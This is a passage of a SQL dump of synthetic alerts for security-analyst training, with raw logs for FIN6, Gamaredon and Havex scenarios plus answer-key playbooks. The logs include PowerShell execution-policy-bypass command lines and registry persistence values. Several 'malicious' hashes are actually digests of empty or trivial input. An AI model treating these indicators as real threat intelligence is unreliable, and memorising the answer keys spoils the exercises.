unauthorized data transfer from the compromised internal server to an external drop server associated with Magecart. The data transferred includes payment information extracted from the internal server. The traffic was observed from internal IP 192.168.10.15 to external IP 203.0.113.45, with the data being exported in a compressed file named \'payments_exfil.zip\'. The hash of the exfiltrated file is 9e107d9d372bb6826bd81d3542a419d6.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"payments_exfil.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"user\":\"websrv_user\",\"action\":\"transfer\",\"status\":\"completed\"}', '2026-01-05 00:07:01', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP associated with Magecart drop servers.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payments_exfil.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename used for exfiltrated payment data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltrated data files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (458, 'Suspicious Vendor Login Detected', 'high', 'SIEM Logs', 'An unauthorized login attempt was detected using compromised credentials from a trusted vendor. The attacker used these credentials to gain initial access to the retail giant\'s POS network.', 'Initial Access', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:20:30Z\",\"event_id\":\"4567\",\"event_type\":\"login_attempt\",\"username\":\"vendor_john_doe\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"login_status\":\"success\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"network_domain\":\"pos_network\",\"hash\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"file_name\":\"pos_access_script.exe\"}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"vendor_john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"The username is associated with a trusted vendor but was used from an unusual location.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"The IP address is linked to multiple unauthorized access attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"The hash corresponds to a known malware used in recent attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_access_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"The filename is consistent with scripts used in previous breaches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (459, 'Trinity Malware Deployment on POS Systems', 'high', 'Endpoint Detection and Response (EDR)', 'FIN6 has deployed Trinity malware on several Point-of-Sale (POS) systems, targeting RAM to scrape unencrypted credit card data.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T14:22:45Z\",\"event_id\":\"4624\",\"computer_name\":\"POS-Server-22\",\"user\":\"svc-posadmin\",\"source_ip\":\"185.23.45.67\",\"internal_ip\":\"192.168.1.105\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\pos_trinity.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"event_description\":\"Execution of suspicious binary linked to Trinity malware on POS system.\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\pos_trinity.exe\"}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known FIN6 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local POS system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Trinity malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_trinity.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename identified as Trinity malware targeting POS systems.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"svc-posadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Service account used in anomalous execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (460, 'Establishing Persistent Access', 'high', 'Network Traffic Analysis', 'The attacker has set up a persistent backdoor on the POS network, ensuring they can regain access even if initial malware installations are removed. Network traffic analysis revealed unauthorized communication from an internal host to a known malicious IP, indicating the presence of a backdoor.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.25\",\"protocol\":\"TCP\",\"port\":\"4444\",\"action\":\"allowed\",\"user\":\"john_doe\",\"process_name\":\"backdoor_service.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_family\":\"APT_Backdoor\",\"event_id\":\"1002\",\"message\":\"Outbound connection to known malicious IP detected from internal host.\"}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to establish persistent access by creating unauthorized external connections.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (461, 'Unauthorized Lateral Movement Detected', 'high', 'Anomaly Detection Systems', 'An unauthorized lateral movement has been detected involving compromised credentials and malware. The attacker, identified as FIN6, is attempting to move laterally through the network, targeting point-of-sale (POS) systems and databases. The activity involves the use of specific malware and compromised user accounts.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:00Z\",\"src_ip\":\"195.22.26.189\",\"dest_ip\":\"192.168.1.15\",\"src_user\":\"j.doe\",\"compromised_credential\":true,\"malware_hash\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"malware_filename\":\"pos_grabber.exe\",\"activity\":{\"description\":\"Lateral movement attempt using compromised credentials\",\"target_system\":\"POS server\",\"method\":\"SMB protocol over port 445\"}}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"195.22.26.189\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with FIN6 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal POS server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for unusual activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Known hash of malware used by FIN6\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"pos_grabber.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Executable associated with POS system attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (462, 'Exfiltration of Credit Card Data', 'high', 'Data Loss Prevention (DLP) Tools', 'FIN6 has initiated the exfiltration of previously scraped credit card data to an external server, marking the completion of their primary objective in this attack cycle.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:05Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"185.199.108.153\",\"destination_domain\":\"malicious-server.com\",\"protocol\":\"HTTPS\",\"file_name\":\"cc_data_dump.zip\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john.doe\",\"alert_trigger\":\"DLP: Credit Card Data Exfiltration Detected\",\"data_volume\":\"25MB\",\"process_name\":\"python.exe\",\"process_id\":4567}', '2026-01-05 00:10:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration activities by FIN6.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious-server.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used by FIN6 for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cc_data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File matches pattern for exfiltration data dumps.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known FIN6 malware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (463, 'Initial Access via Weaponized Word Document', 'high', 'Email Gateway Logs', 'A phishing email was detected containing a weaponized Word document. The email was designed to appear as an official military communication, enticing the recipient to open the attachment. Upon opening, the document initiates a template injection exploit aimed at gaining initial access to the target\'s network.', 'Phishing', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_id\":\"d5f7a8e3-9abc-4567-80d5-5d3fa8765b41\",\"source_ip\":\"91.121.92.36\",\"destination_ip\":\"192.168.1.45\",\"sender_email\":\"info@military-ops.co\",\"recipient_email\":\"j.doe@target-organization.com\",\"subject\":\"Urgent: Military Operations Briefing\",\"attachment\":{\"filename\":\"Operations_Update.docx\",\"hash\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\"},\"malware_family\":\"Gamaredon\",\"exploit_technique\":\"Template Injection\"}', '2026-01-05 02:59:34', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"91.121.92.36\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Gamaredon operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"info@military-ops.co\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Email domain used in previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with Gamaredon malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (464, 'Execution of Embedded VBScript Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the Word document, a concealed VBScript backdoor is executed, connecting to a command and control server, enabling remote command execution and persistence within the network.', 'Code Execution', 'T1059.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"event_type\":\"code_execution\",\"host_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process_name\":\"winword.exe\",\"script_name\":\"malicious_script.vbs\",\"script_hash\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"c2_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"command\":\"cscript.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"action\":\"process_created\"}', '2026-01-05 02:59:34', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript backdoor\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a malicious VBScript backdoor\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (465, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Analysis', 'The attackers have initiated data exfiltration by encrypting sensitive military data and transferring it through a secure TLS channel to an external server. The data was gathered using a deployed VBScript backdoor, enabling discreet exfiltration.', 'Data Theft', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:53:21Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.77\",\"src_port\":\"44321\",\"dest_port\":\"443\",\"protocol\":\"TLS\",\"username\":\"jdoe\",\"filename\":\"military_data_enc.zip\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"transferred\",\"encryption\":\"AES-256\",\"malware_name\":\"VBScript_Backdoor\"}', '2026-01-05 02:59:34', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript_Backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"military_data_enc.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encrypted file potentially containing sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"internal\",\"details\":\"User credentials potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (466, 'Initial Access: Trojanized Software Update Detected', 'high', 'Software Update Logs', 'A trojanized software update for the ICS system has been detected. This update was distributed by attackers to gain initial access into the network by compromising the supply chain of the legitimate software provider.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:10Z\",\"event_type\":\"software_update\",\"software_name\":\"ICS_Control_Update\",\"version\":\"v2.3.4\",\"update_status\":\"completed\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_user\":\"admin\",\"file_path\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"signature_status\":\"invalid\",\"detected_malware\":\"Trojan.IcsMalware\",\"internal_ip_range\":\"192.168.0.0/16\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of target device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known trojanized update.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file path for trojanized software.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (467, 'Execution: \'Havex\' RAT Deployment', 'high', 'Endpoint Detection and Response (EDR)', 'Following the initial access, \'Havex\' RAT is executed to provide attackers with remote control over the compromised systems. The malware was identified running on a critical server, attempting to establish outbound connections to known malicious IPs.', 'Remote Access Trojan', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T15:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"alert_generated\":true}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers for Havex RAT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attack.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Havex RAT payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"havex.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to execute Havex RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (468, 'Persistence: Registry Modification Identified', 'high', 'Registry Logs', 'The attackers modify registry settings to maintain persistence, ensuring their presence even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"event_id\":4657,\"computer_name\":\"WIN-EXAMPLE\",\"user\":\"malicious_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"operation\":\"SetValue\",\"value_name\":\"SuspiciousProgram\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\malicious\\\\malware.exe\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.42\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample used by attackers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized registry modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (469, 'Lateral Movement: SMB Traffic Anomaly', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected anomalous SMB traffic consistent with lateral movement activities. Using the \'Havex\' Remote Access Trojan (RAT), attackers are performing network reconnaissance to map the industrial control network. This involves the identification of other critical systems within the network by exploiting the SMB protocol.', 'Network Reconnaissance', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:23:55Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.75\",\"destination_port\":445,\"protocol\":\"SMB\",\"malware_name\":\"Havex\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"john.doe\",\"filename\":\"netmap.exe\",\"external_attacker_ip\":\"203.0.113.45\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical system identified within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with the Havex RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Public IP address related to known malicious activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"netmap.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for network reconnaissance.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 